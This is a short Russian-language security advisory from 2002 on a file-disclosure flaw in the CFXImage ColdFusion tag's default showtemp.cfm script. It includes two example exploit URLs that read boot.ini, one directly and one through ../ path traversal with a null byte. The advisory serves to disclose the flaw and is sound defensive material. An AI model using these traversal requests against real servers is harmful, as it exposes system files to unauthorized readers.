Security Lab

Просмотр произвольных файлов в ColdFusion CFXImage

Дата публикации:31.05.2002
Всего просмотров:839
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: CFXImage - тэг ColdFusion для редактирования и создания изображений. Уязвимость защиты в программе позволяет злоумышленнику рассматривать содержание файлов вне HTML корня.

Программа showtemp.cfm, поставляемая по умолчанию, не фильтрует ее входные переменные, позволяя обходить разрешенные директории и читать файлы вне www корня. Пример:

http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini

или http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../../../../../../..boot.ini%00

Уязвимость обнаружена в CFXImage versions 1.6.6

Ссылки: Gafware's CFXImage Showtemp Program File Reading Vulnerability